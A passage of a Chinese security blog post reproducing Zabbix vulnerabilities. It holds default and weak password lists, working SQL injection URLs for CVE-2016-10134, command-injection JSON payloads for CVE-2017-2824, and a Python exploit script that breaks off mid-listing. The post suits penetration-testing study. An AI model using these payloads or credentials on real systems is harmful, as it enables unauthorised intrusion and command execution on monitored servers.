<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>Zabbix 漏洞深入利用 - Geekby&#39;s Blog</title><meta name="Description" content="Zabbix 漏洞深入利用"><meta property="og:title" content="Zabbix 漏洞深入利用" />
<meta property="og:description" content="Zabbix 漏洞深入利用" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2022/03/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2022-03-21T15:00:00+08:00" />
<meta property="article:modified_time" content="2022-03-21T15:00:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Zabbix 漏洞深入利用"/>
<meta name="twitter:description" content="Zabbix 漏洞深入利用"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2022/03/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8/" /><link rel="prev" href="https://www.geekby.site/2022/03/%E5%AF%B9%E8%B1%A1%E5%AD%98%E5%82%A8%E6%94%BB%E9%98%B2%E6%A1%88%E4%BE%8B/" /><link rel="next" href="https://www.geekby.site/2022/03/spring-beans-rce%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "Zabbix 漏洞深入利用",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2022\/03\/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "Zabbix, 漏洞复现","wordcount":  1123 ,
        "url": "https:\/\/www.geekby.site\/2022\/03\/zabbix%E6%BC%8F%E6%B4%9E%E6%B7%B1%E5%85%A5%E5%88%A9%E7%94%A8\/","datePublished": "2022-03-21T15:00:00+08:00","dateModified": "2022-03-21T15:00:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "Zabbix 漏洞深入利用"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">Zabbix 漏洞深入利用</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><i class="far fa-folder fa-fw"></i>漏洞复现</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2022-03-21">2022-03-21</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 1123 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 6 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#1-前言">1 前言</a>
      <ul>
        <li><a href="#11-组件">1.1 组件</a></li>
        <li><a href="#12-网络架构">1.2 网络架构</a></li>
        <li><a href="#13-zabbix-agent-配置">1.3 Zabbix Agent 配置</a></li>
      </ul>
    </li>
    <li><a href="#2-zabbix-历史漏洞">2 Zabbix 历史漏洞</a>
      <ul>
        <li><a href="#21-弱口令">2.1 弱口令</a>
          <ul>
            <li><a href="#211-web-端">2.1.1 Web 端</a></li>
            <li><a href="#212-mysql-端">2.1.2 mysql 端</a></li>
          </ul>
        </li>
        <li><a href="#22-cve-2016-10134---sql-注入漏洞">2.2 CVE-2016-10134 - SQL 注入漏洞</a>
          <ul>
            <li><a href="#221-已有用户凭据">2.2.1 已有用户凭据</a></li>
            <li><a href="#222-无用户凭据">2.2.2 无用户凭据</a></li>
          </ul>
        </li>
        <li><a href="#23-cve-2017-2824---命令注入">2.3 CVE-2017-2824 - 命令注入</a></li>
        <li><a href="#24-cve-2020-11800---命令注入">2.4 CVE-2020-11800 - 命令注入</a></li>
      </ul>
    </li>
    <li><a href="#3-zabbix-后渗透测试">3 Zabbix 后渗透测试</a>
      <ul>
        <li><a href="#31-enableremotecommands-参数远程命令执行">3.1 EnableRemoteCommands 参数远程命令执行</a></li>
        <li><a href="#32-userparameter-自定义参数命令注入">3.2 UserParameter 自定义参数命令注入</a></li>
        <li><a href="#33-任意文件读取">3.3 任意文件读取</a></li>
        <li><a href="#34-windows-目录遍历">3.4 Windows 目录遍历</a></li>
        <li><a href="#35-windows-unc-路径利用">3.5 Windows UNC 路径利用</a></li>
        <li><a href="#36-zabbix-proxy-和主动检查模式利用场景">3.6 Zabbix Proxy 和主动检查模式利用场景</a></li>
      </ul>
    </li>
    <li><a href="#参考">参考</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="zabbix-漏洞深入利用">Zabbix 漏洞深入利用</h1>
<h2 id="1-前言">1 前言</h2>
<p><a href="https://www.zabbix.com/" target="_blank" rel="noopener noreffer">Zabbix</a> 是一个基于 WEB 界面的提供分布式系统监视系统监视以及网络监视功能的企业级的开源解决方案，能监视各种网络参数，保证服务器系统服务器系统的安全运营；并提供灵活的通知机制以让系统管理员快速定位、解决存在的各种问题。</p>
<h3 id="11-组件">1.1 组件</h3>
<p>Zabbix 监控系统由以下几个组件部分构成：</p>
<ul>
<li><strong>Zabbix Server</strong></li>
</ul>
<p>Zabbix Server 是所有配置、统计和操作数据的中央存储中心，也是 Zabbix 监控系统的告警中心。在监控的系统中出现任何异常，将被发出通知给管理员。Zabbix Server 的功能可分解成为三个不同的组件，分别为 Zabbix Server 服务、Web 后台及数据库。</p>
<ul>
<li><strong>Zabbix Proxy</strong></li>
</ul>
<p>Zabbix Proxy 是在大规模分布式监控场景中采用一种分担 Zabbix Server 压力的分层结构，其多用在跨机房、跨网络的环境中，Zabbix Proxy 可以代替 Zabbix Server 收集性能和可用性数据，然后把数据汇报给 Zabbix Server，并且在一定程度上分担了 Zabbix Server 的压力。</p>
<ul>
<li><strong>Zabbix Agent</strong></li>
</ul>
<p>Zabbix Agent 部署在被监控的目标机器上，以主动监控本地资源和应用程序（硬盘、内存、处理器统计信息等）。Zabbix Agent 收集本地的状态信息并将数据上报给 Zabbix Server 用于进一步处理。</p>
<h3 id="12-网络架构">1.2 网络架构</h3>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220944828.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220944828.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220944828.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220944828.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220944828.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220944828.png-water_print" /></p>
<p>对于 Zabbix Agent 客户端来说，根据请求类型可分为被动模式及主动模式：</p>
<ul>
<li>被动模式：Server 向 Agent 的 10050 端口获取监控项数据，Agent 根据监控项收集本机数据并响应。</li>
<li>主动模式：Agent 主动请求 Server (Proxy) 的 10051 端口获取监控项列表，并根据监控项收集本机数据提交给 Server (Proxy)</li>
</ul>
<h3 id="13-zabbix-agent-配置">1.3 Zabbix Agent 配置</h3>
<p>Zabbix Agent 服务的配置文件为 <code>zabbix_agentd.conf</code>，Linux 默认路径在 <code>/etc/zabbix/zabbix_agentd.conf</code>。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220952335.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220952335.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220952335.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220952335.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220952335.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220952335.png-water_print" /></p>
<p>配置文件中包含的一些基本设置选项：</p>
<ul>
<li><strong>Server 参数</strong></li>
</ul>
<p>Server 或 Proxy 的 IP、CIDR、域名等，Agent 仅接受来自 Server 参数的 IP 请求（白名单）。</p>
<ul>
<li><strong>ServerActive 参数</strong></li>
</ul>
<p>Server 或 Proxy 的 IP、CIDR、域名等，用于主动模式，Agent 主动向 ServerActive 参数的 IP 发送请求。</p>
<ul>
<li><strong>StartAgents 参数</strong></li>
</ul>
<p>zabbix 启动之后开启被动监控的进程数量，默认为3。如果设置为 0，那么 zabbix 被动监控被禁用，并且不会监听 10050 端口。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220958908.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220958908.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220958908.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220958908.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220958908.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203220958908.png-water_print" /></p>
<p>配置文件中包含的一些可能存在风险的设置选项：</p>
<ul>
<li><strong>Include 参数</strong></li>
</ul>
<p>加载配置文件目录单个文件或所有文件，通常包含的 conf 都是配置 <code>UserParameter</code> 自定义用户参数。</p>
<ul>
<li><strong>UserParameter 参数</strong></li>
</ul>
<p>自定义用户参数，格式为<code>UserParameter=&lt;key&gt;,&lt;command&gt;</code>，Server 可向 Agent 执行预设的自定义参数命令以获取监控数据，以官方示例为例：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">UserParameter=ping[*],echo $1
</span></span></code></pre></td></tr></table>
</div>
</div><p>当 Server 向 Agent 执行 <code>ping[aaaa]</code> 指令时，<code>$1</code> 为传参的值，Agent 经过拼接之后执行的命令为<code>echo aaaa</code>，最终执行结果为<code>aaaa</code>。</p>
<p>command 存在命令拼接，但由于传参内容受 <code>UnsafeUserParameters</code> 参数限制，默认无法传参特殊符号，所以默认配置利用场景有限。</p>
<ul>
<li><strong>UnsafeUserParameters 参数</strong></li>
</ul>
<p>自定义用户参数是否允许传参任意字符，默认不允许字符 <code>\ ' &quot; `` * ? [ ] { } ~ $ ! &amp; ; ( ) &lt; &gt; | # @</code>，当 UnsafeUserParameters=1 时，允许特殊字符。</p>
<p>以 <code>UserParameter=ping[*],echo $1</code> 为例，向 Agent 执行指令 <code>ping[test &amp;&amp; whoami]</code>，经过命令拼接后最终执行 <code>echo test &amp;&amp; whoami</code>，成功注入执行 shell 命令。</p>
<ul>
<li><strong>EnableRemoteCommands 参数</strong></li>
</ul>
<p>是否允许来自 Zabbix Server 的远程命令，开启后可通过 Server 下发 shell 脚本在 Agent 上执行。当值为 1 时，允许远程下发命令。</p>
<ul>
<li><strong>AllowRoot 参数</strong></li>
</ul>
<p>Linux 默认以低权限用户 zabbix 运行，开启后以 root 权限运行 zabbix_agentd 服务。当其值为 1 时，允许以 root 权限执行命令。</p>
<h2 id="2-zabbix-历史漏洞">2 Zabbix 历史漏洞</h2>
<h3 id="21-弱口令">2.1 弱口令</h3>
<h4 id="211-web-端">2.1.1 Web 端</h4>
<p>Zabbix 安装后自带 Admin 管理员用户和 Guests 访客用户（低版本），可登陆 Zabbiax 后台。</p>
<p>常见弱口令组合：</p>
<ul>
<li><code>admin:zabbix</code></li>
<li><code>Admin:zabbix</code></li>
<li><code>guset:空口令</code></li>
</ul>
<h4 id="212-mysql-端">2.1.2 mysql 端</h4>
<p>由于 root 用户默认情况下无法外连，运维通常会新建 MySQL 用户 <code>zabbix</code>，常见密码如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">123456
</span></span><span class="line"><span class="cl">zabbix
</span></span><span class="line"><span class="cl">zabbix123
</span></span><span class="line"><span class="cl">zabbix1234
</span></span><span class="line"><span class="cl">zabbix12345
</span></span><span class="line"><span class="cl">zabbix123456
</span></span></code></pre></td></tr></table>
</div>
</div><p>拿下 MySQL 数据库后，可解密 users 表的密码 md5 值，或者直接替换密码的 md5 为已知密码，即可登录 Zabbix Web。</p>
<h3 id="22-cve-2016-10134---sql-注入漏洞">2.2 CVE-2016-10134 - SQL 注入漏洞</h3>
<blockquote>
<p>该漏洞的具体分析可参考：<a href="https://blog.iwonder.run/2020/12/20/zabbix-sql-zhu-ru-lou-dong-cve-2016-10134/" target="_blank" rel="noopener noreffer">zabbix SQL注入漏洞（CVE-2016-10134）</a>，原理是 insert 插入时未对用户输入的数据进行过滤，可以进行显错注入。</p>
</blockquote>
<h4 id="221-已有用户凭据">2.2.1 已有用户凭据</h4>
<p>以 Guest 用户登录后，查看 Cookie 中的<code>zbx_sessionid</code>，复制后 <code>16</code> 位字符：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221020167.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221020167.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221020167.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221020167.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221020167.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221020167.png-water_print" /></p>
<p>将这 16 个字符作为 sid 的值，访问 <code>http://your-ip:8080/latest.php?output=ajax&amp;sid=16位 ID&amp;favobj=toggle&amp;toggle_open_state=1&amp;toggle_ids[]=updatexml(0,concat(0xa,user()),0)</code>，可见成功注入：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221024598.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221024598.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221024598.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221024598.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221024598.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221024598.png-water_print" /></p>
<h4 id="222-无用户凭据">2.2.2 无用户凭据</h4>
<p>这个漏洞也可以通过 jsrpc.php 触发，且无需登录：<code>http://IP:8080/jsrpc.php?type=0&amp;mode=1&amp;method=screen.get&amp;profileIdx=web.item.graph&amp;resourcetype=17&amp;profileIdx2=updatexml(0,concat(0xa,user()),0)</code>：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221025643.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221025643.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221025643.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221025643.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221025643.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221025643.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221043435.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221043435.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221043435.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221043435.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221043435.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221043435.png-water_print" /></p>
<p>将用户密码 MD5 还原即可登录。漏洞利用脚本：<a href="https://github.com/RicterZ/zabbixPwn" target="_blank" rel="noopener noreffer">zabbixPwn</a></p>
<h3 id="23-cve-2017-2824---命令注入">2.3 CVE-2017-2824 - 命令注入</h3>
<p>利用该漏洞，需要服务端开启了自动注册功能，所以我们先以管理员的身份开启自动注册功能。使用账号密码 <code>admin/zabbix</code> 登录后台，进入 Configuration-&gt;Actions，将 <code>Event source</code> 调整为 <code>Auto registration</code>，然后点击 <code>Create action</code>，创建一个 Action，名字随意：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117862.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117862.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117862.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117862.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117862.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117862.png-water_print" /></p>
<p>第三个标签页，创建一个 Operation，type是 <code>Add Host</code>：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117678.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117678.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117678.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117678.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117678.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221117678.png-water_print" /></p>
<p>保存。这样就开启了自动注册功能，攻击者可以将自己的服务器注册为 Agent。</p>
<p>第一条数据：</p>
<p><code>active checks</code>是 Agent 主动检查时用于获取监控项列表的命令，Zabbix Server 在开启自动注册的情况下，通过 <code>active checks</code> 命令请求获取一个不存在的 host 时，自动注册机制会将 json 请求中的 host、ip 添加到 interface 数据表里。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;request&#34;</span><span class="p">:</span><span class="s2">&#34;active checks&#34;</span><span class="p">,</span><span class="nt">&#34;host&#34;</span><span class="p">:</span><span class="s2">&#34;vulhub&#34;</span><span class="p">,</span><span class="nt">&#34;ip&#34;</span><span class="p">:</span><span class="s2">&#34;;touch /tmp/success&#34;</span><span class="p">}</span><span class="err">))</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>第二条数据：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-JSON" data-lang="JSON"><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;request&#34;</span><span class="p">:</span><span class="s2">&#34;command&#34;</span><span class="p">,</span><span class="nt">&#34;scriptid&#34;</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span><span class="nt">&#34;hostid&#34;</span><span class="p">:</span><span class="mi">10001</span><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><code>command</code> 指令可以在未授权的情况下可指定主机 (hostid) 执行指定脚本 (scriptid)，Zabbix 存在 3 个默认脚本，脚本中的 <code>{HOST.CONN}</code> 在脚本调用的时候会被替换成主机 IP。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"># scriptid == 1 == /bin/ping -c {HOST.CONN} 2&gt;&amp;1
</span></span><span class="line"><span class="cl"># scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2&gt;&amp;1
</span></span><span class="line"><span class="cl"># scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2&gt;&amp;1
</span></span></code></pre></td></tr></table>
</div>
</div><p><code>scriptid</code> 指定其中任意一个，<code>hostid</code> 为注入恶意 Payload 后的主机 id，但自动注册后的 <code>hostid</code> 是未知的，所以通过 <code>command</code> 指令遍历 <code>hostid</code> 的方式都执行一遍，最后成功触发命令注入漏洞。</p>
<p>由于默认脚本的类型限制，脚本都是在 Zabbix Server 上运行，Zabbix Proxy 是无法使用 command 指令的。payload 长度受限制可拆分多次执行，必须更换 host 名称以执行新的payload。</p>
<p>EXP 如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">json</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">conn</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">create_connection</span><span class="p">((</span><span class="n">ip</span><span class="p">,</span> <span class="mi">10051</span><span class="p">),</span> <span class="mi">10</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">conn</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">data</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">    <span class="n">data</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">2048</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">data</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">send</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="p">{</span><span class="s2">&#34;request&#34;</span><span class="p">:</span><span class="s2">&#34;active checks&#34;</span><span class="p">,</span><span class="s2">&#34;host&#34;</span><span class="p">:</span><span class="s2">&#34;vulhub&#34;</span><span class="p">,</span><span class="s2">&#34;ip&#34;</span><span class="p">:</span><span class="s2">&#34;;touch /tmp/success&#34;</span><span class="p">}))</span>
